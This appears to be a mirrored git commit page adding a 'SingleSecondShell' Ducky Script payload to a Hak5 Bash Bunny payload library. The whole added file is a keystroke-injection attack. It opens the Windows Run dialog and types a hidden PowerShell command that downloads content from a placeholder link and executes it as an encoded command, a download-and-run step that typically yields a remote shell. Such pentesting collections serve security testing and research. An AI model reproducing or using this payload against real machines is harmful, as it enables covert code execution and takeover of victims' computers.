mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Added SingleSecondShell payload (#115)
* Add files via upload * Update readme.md
This commit is contained in:
6
payloads/library/SingleSecondShell/ducky_script.txt
Normal file
6
payloads/library/SingleSecondShell/ducky_script.txt
Normal file
@@ -0,0 +1,6 @@
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell -windowstyle hidden $u='YOUR_LINK';$r=Invoke-WebRequest -Uri $u;powershell -nop -e $r.content
|
||||
DELAY 100
|
||||
ENTER
|
||||
Reference in New Issue
Block a user